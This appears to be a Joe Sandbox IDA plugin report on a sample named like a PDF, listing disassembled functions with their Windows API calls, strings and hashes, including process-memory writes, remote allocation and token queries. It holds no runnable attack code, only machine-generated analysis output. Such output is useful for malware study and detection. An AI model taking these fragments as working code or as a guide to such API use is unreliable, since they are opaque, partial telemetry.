                                                    • Opcode Fuzzy Hash: d48dd6f6b9c3a523a5ae58f2fcff88a237080f4df8a23f16f2f3a358fa8a27b1
                                                    • Instruction Fuzzy Hash: A52160B0800205AFDB129F59ED84F9E7BA8B710356F18472AF825A61F0C3715849DB55
                                                    APIs
                                                    • __calloc_crt.LIBCMT ref: 003621A9
                                                    • CreateThread.KERNEL32(?,?,003622DF,00000000,?,?), ref: 003621ED
                                                    • GetLastError.KERNEL32 ref: 003621F7
                                                    • _free.LIBCMT ref: 00362200
                                                    • __dosmaperr.LIBCMT ref: 0036220B
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 2664167353-0
                                                    • Opcode ID: 1b6ee2cf3488f4912603edeaa52447b706184de4fde23ef98de59fc70c0959c4
                                                    • Instruction ID: cb1a11f04bac597a5717192d8f1ac292967cf0c7a1ba5e1589f08d6e2eba802c
                                                    • Opcode Fuzzy Hash: 1b6ee2cf3488f4912603edeaa52447b706184de4fde23ef98de59fc70c0959c4
                                                    • Instruction Fuzzy Hash: A7112B331087466FDB13AFA5DC42D9B7B98EF01774B128829FE14CA149DB71D81187A0
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                                    • GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                                    • HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: c3c36cac4f3f82dfff899befacf59add2e243ce35c40d141ec2648b7aea02ae0
                                                    • Instruction ID: 52c33abca12398fb53ac6cfdb98265a328a187101b003ef60ae5d757ff74544a
                                                    • Opcode Fuzzy Hash: c3c36cac4f3f82dfff899befacf59add2e243ce35c40d141ec2648b7aea02ae0
                                                    • Instruction Fuzzy Hash: F60181B0200205BFDB224FA5DC48D6B7BACEF89355B114439F409C3250D671DC51CB61
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387A74
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00387A82
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00387A8A
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00387A94
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: f3a3229c5b4e67861c75147ea5f9101db7073a65ddefe592a5d9df06791fe682
                                                    • Instruction ID: 5613e833f16b4338959938498a5b60236c1ee5491a71cf8ce3992b85e9689b97
                                                    • Opcode Fuzzy Hash: f3a3229c5b4e67861c75147ea5f9101db7073a65ddefe592a5d9df06791fe682
                                                    • Instruction Fuzzy Hash: 23012931C04619EBCF06AFE4DC88AEDBB7DFB08711F150495E502F2250DB34E65487A1
                                                    APIs
                                                    • CLSIDFromProgID.OLE32 ref: 00379ADC
                                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 00379AF7
                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 00379B05
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00379B15
                                                    • CLSIDFromString.OLE32(?,?), ref: 00379B21
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: 3b6f7e2978cd5de57ad632d13caed294bf7e4de224f5cb8ab3e5737906c3d0cd
                                                    • Instruction ID: d634e4c02750dffa52a9a86994efe2f74cf290f0661a5e38fbe6eb9cd1876852
                                                    • Opcode Fuzzy Hash: 3b6f7e2978cd5de57ad632d13caed294bf7e4de224f5cb8ab3e5737906c3d0cd
                                                    • Instruction Fuzzy Hash: 32018F76600204BFDB224F64EC44F9ABBEDEB44351F148039F90AE6210D775ED009BA0
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0037AA79
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0037AA83
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0037AA92
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0037AA99
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0037AAAF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 6d348caa78b534ec444c49f188941b31b61633cae840ddaaa6147bf77dcbc96a
                                                    • Instruction ID: 91657624a1d20a31aa9356a43290fa10c027621c8da6bcfea3027a3411b88132
                                                    • Opcode Fuzzy Hash: 6d348caa78b534ec444c49f188941b31b61633cae840ddaaa6147bf77dcbc96a
                                                    • Instruction Fuzzy Hash: 28F0C2312003146FEB221FA4EC88E6B3BACFF89754F004029F905C7190DB64AC02CF61
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0037AADA
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAE4
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAF3
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAFA
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AB10
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 32c5fce5e0838bfb4952da16771c91b9b0cea00e314d9ae04cfc9f2d452ed483
                                                    • Instruction ID: 587ebedc3deeb186a9cf057577990a426df113b7d85bf608e9bc90951bc8a616
                                                    • Instruction Fuzzy Hash: 02F062752012186FEB220FA5EC88E6B3B6DFF85754F014039F946C7190CB65AC02DB61
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0037EC94
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0037ECAB
                                                    • MessageBeep.USER32(00000000), ref: 0037ECC3
                                                    • KillTimer.USER32(?,0000040A), ref: 0037ECDF
                                                    • EndDialog.USER32(?,00000001), ref: 0037ECF9
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 81d471be8b861655e841c4e0e5558cf48055bdc90ebfc6df2ada8281143b0b7b
                                                    • Instruction ID: afda34c6342097eea55e29691c0819d23806fd0027d12b24880c89c25b03e19f
                                                    • Instruction Fuzzy Hash: F1016D34500715ABEB375B10DE4EF9677BCBB04B05F0045A9F686A54E0DBF4BA54CB44
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 0035B0BA
                                                    • StrokeAndFillPath.GDI32(?,?,003BE680,00000000,?,?,?), ref: 0035B0D6
                                                    • SelectObject.GDI32(?,00000000), ref: 0035B0E9
                                                    • DeleteObject.GDI32 ref: 0035B0FC
                                                    • StrokePath.GDI32(?), ref: 0035B117
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: 2232623dea31af6cd6daa0445b0216fc6a3e7d2c4b62902ca2228f8cf2394ba2
                                                    • Instruction ID: 908d28fd08589c3323ac58d6fc00fd62d686dc1addae9dfe1915b40ef7536e49
                                                    • Instruction Fuzzy Hash: CCF0EC30000644EFDB639F69EE4DB597FA9B710362F088725F825950F0C7729959DF54
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0038F2DA
                                                    • CoCreateInstance.OLE32(003CDA7C,00000000,00000001,003CD8EC,?), ref: 0038F2F2
                                                    • CoUninitialize.OLE32 ref: 0038F555
                                                    Strings
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize
                                                    • String ID: .lnk
                                                    • API String ID: 948891078-24824748
                                                    • Opcode ID: 24c9c4a6c6bb7036d1ca7d5e0bbea444fdc8027b9d8688e4ce349a5d75cbfefa
                                                    • Instruction ID: e7a13b3f0891bfe8367f9cab395e22c8b1b1bc349835b30e3e98885ce4e9151a
                                                    • Instruction Fuzzy Hash: 77A14C71104301AFD302EF64C881EABB7ECEF99714F00495DF5559B2A2EB70EA49CB52
                                                    APIs
                                                      • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                                    • CoInitialize.OLE32(00000000), ref: 0038E85D
                                                    • CoCreateInstance.OLE32(003CDA7C,00000000,00000001,003CD8EC,?), ref: 0038E876
                                                    • CoUninitialize.OLE32 ref: 0038E893
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    Strings
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                    • String ID: .lnk
                                                    • API String ID: 2126378814-24824748
                                                    • Opcode ID: 8a86008b57f9976ed0e5ea8c244137033bf9d81a4d9a0ea25d9e4a31e0d52878
                                                    • Instruction ID: 9010150a3e71575910db39baa6c6e3e870ca54d4d17669b385c80a9191caa34a
                                                    • Instruction Fuzzy Hash: EDA154356043019FCB16EF14C484E6ABBE5BF89710F058999F99A9B3A2CB31FC45CB81
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 003632ED
                                                      • Part of subcall function 0036E0D0: __87except.LIBCMT ref: 0036E10B
                                                    Strings
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: 7a04ef08070da80804341e7c43b11654f4a4e4096dcb089522376aee54e6f3a8
                                                    • Instruction ID: 71e0ada42bf3001baf5a01f2d70fcaa584b386519d0f346f0173e80c2fe4baff
                                                    • Instruction Fuzzy Hash: 5F517A79A0920296CB137714DD2237A3B98DB41710F31CD29F4D5862EDEF388E9CA646
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$+
                                                    • API String ID: 0-2552117581
                                                    • Opcode ID: d6751d63c67bb8c1c6eb5fac35499e7becd326bae71f08e366ad00a48b84de85
                                                    • Instruction ID: e62b79982c2fc209de13cf4ca3540da493f8bc85f59cf5b8a42058ba3416af2a
                                                    • Instruction Fuzzy Hash: 3D512E305042269FDB27DF28C841AFA7BE8EF66304F694015FD81AF6A0D734AE46C720
                                                    APIs
                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,003DDC50,?,0000000F,0000000C,00000016,003DDC50,?), ref: 00384645
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003846C5
                                                    Strings
                                                    Similarity
                                                    • API ID: BuffCharUpper$__itow__swprintf
                                                    • String ID: REMOVE$THIS
                                                    • API String ID: 3797816924-776492005
                                                    • Opcode ID: 34c1463aa1f5bcab3aa28e1bfb647144b6f1a4d5b7d76f2c1e4dcf572a1a2e93
                                                    • Instruction ID: 77d769cf1468961bb1d522aa026d9222460629605a2b201531777a2f72db70e6
                                                    • Instruction Fuzzy Hash: 49414F74A0021A9FCF06EF64C881AAEB7B5FF49304F1480A9F956AF661D734ED45CB50
                                                    APIs
                                                      • Part of subcall function 0038430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0037BC08,?,?,00000034,00000800,?,00000034), ref: 00384335
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0037C1D3
                                                      • Part of subcall function 003842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0037BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00384300
                                                      • Part of subcall function 0038422F: GetWindowThreadProcessId.USER32(?,?), ref: 0038425A
                                                      • Part of subcall function 0038422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0037BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0038426A
                                                      • Part of subcall function 0038422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0037BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00384280
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0037C240
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0037C28D
                                                    Strings
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: 6930892c48bb3461f7d75f02ecb619a3845086fd259d582a9ed05eec691889fd
                                                    • Instruction ID: 7da4488d468da707deaae12b3b6c0be081efdf1761b55fe66bef5d11228de72d
                                                    • Instruction Fuzzy Hash: 6E414E7690021DBFDB12EFA4CC81AEEB7B8AF09300F004499FA45BB181DA756E45CB61
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003DDC00,00000000,?,?,?,?), ref: 003AA6D8
                                                    • GetWindowLongW.USER32 ref: 003AA6F5
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003AA705
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: 812b2cd872a446565bc02d4d24e79bd455d4baec800857b269f71c7087df778f
                                                    • Instruction ID: 17e4b9a4e06ef2e38cee95db115bd6f944229aca0628d6af39bc101d31032e6e
                                                    • Instruction Fuzzy Hash: 98319032100A05ABDB128E74CC45FEB77A9EB4A324F254725F975932E0CB75AC50DB50
                                                    APIs
                                                    • _memset.LIBCMT ref: 00395190
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003951C6
                                                    Strings
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |$D9
                                                    • API String ID: 1413715105-3281666953
                                                    • Opcode ID: f1b18a61842c84e9d4773f2423fb17af849675036e702d20b7d9a4f53d8714d9
                                                    • Instruction ID: 5eacfabc5bd0c5773d876d6a6b8d7ddf623ef35c6728153f3a2c8b7a4cbf174c
                                                    • Instruction Fuzzy Hash: 13313B71C11119ABCF42EFE4CC85AEE7FB9FF14710F100019F915AA166DB71AA46DBA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003AA15E
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003AA172
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003AA196
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: ec109910077ee45d0af9be9ed875f083cdab414e0974df1a0528e6ce747d7fc3
                                                    • Instruction ID: 9491aeb65faa9ed33e9cdec7059fe091d7c35059da3a09f90fd85d951df9fee9
                                                    • Instruction Fuzzy Hash: 0221AB33500618BBEF128FA4CC82FEA3B7AEF49714F110214FA55AB190D7B5AC55CBA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003AA941
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003AA94F
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003AA956
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: 7bccadcdf9d07575a9c094fd1b5118ff39351a5d58e8854aa007f80b1a927bf7
                                                    • Instruction ID: a2ce96dfc4fc017371ca6c8c9ecca0bbfe1035b9abe687eff71b71bd10052ee9
                                                    • Opcode Fuzzy Hash: 7bccadcdf9d07575a9c094fd1b5118ff39351a5d58e8854aa007f80b1a927bf7
                                                    • Instruction Fuzzy Hash: C92171B660060AAFEB12DF18CC91DB737ADEF5A3A4B45055DFA049B261CB31EC11CB61
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003A9A30
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003A9A40
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003A9A65
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 97c56d23a5ecb1920866fd83359e74d7a91b38a305826e5e053ec511717cf0ca
                                                    • Instruction ID: 9c955436a549e4f508bd2639efe7ac9715c38c140804038caa7f4eeb8ef447eb
                                                    • Opcode Fuzzy Hash: 97c56d23a5ecb1920866fd83359e74d7a91b38a305826e5e053ec511717cf0ca
                                                    • Instruction Fuzzy Hash: 4A218631610118BFDB128F54CC85FBB3BAEEF8A750F11412AF954AB190C7719C518790
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003AA46D
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003AA482
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003AA48F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: 5dbd05dd210a5fdf813b386ef044717584b320fe76071686d2f88b1f62e627ec
                                                    • Instruction ID: 1b137bf9442fe3dc3b8ed93f8ee333441868e1706e5997e25928a77b43a22419
                                                    • Opcode Fuzzy Hash: 5dbd05dd210a5fdf813b386ef044717584b320fe76071686d2f88b1f62e627ec
                                                    • Instruction Fuzzy Hash: 4311E772200208BEEF225F65CC46FAB3B6DEF89754F024128FA45A61A1D7B2E811C724
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00362350,?), ref: 003622A1
                                                    • GetProcAddress.KERNEL32(00000000), ref: 003622A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 2574300362-340411864
                                                    • Opcode ID: 061b03e113fd36d58b3cb80a3b7fb60f15bd991caba0ef47a4d676debe18c04d
                                                    • Instruction ID: 10ae4f635a3fca6262cbf21446ac0063556212b09b5a5b5e1ca4d0c921c619e1
                                                    • Opcode Fuzzy Hash: 061b03e113fd36d58b3cb80a3b7fb60f15bd991caba0ef47a4d676debe18c04d
                                                    • Instruction Fuzzy Hash: ECE01A74A90701ABDB925F71ED49F653668BB00706F008434F142E90B4CFB65440DF08
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00362276), ref: 00362376
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0036237D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 2574300362-2819208100
                                                    • Opcode ID: 9e450e52136220866fa385a3f9f4a2ad19b9f21d68d5aa7fae401172d800b000
                                                    • Instruction ID: 60f59e0b4ec5989ad281798e13c10b6d06e6ba528c4878880720411397683414
                                                    • Opcode Fuzzy Hash: 9e450e52136220866fa385a3f9f4a2ad19b9f21d68d5aa7fae401172d800b000
                                                    • Instruction Fuzzy Hash: 86E0ECB4544701AFDB235F61FE0DF153A68B704702F124438F20EEA1B4CBBA6800DB18
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: a50b67f14435d20545fb30f495ea7534014c6536e26bbd3a72e56a4354ebf78e
                                                    • Instruction ID: 715cbc91e8517f9b3117b0010a82d7b047295103f7ebe42fc1e6187896a30e9f
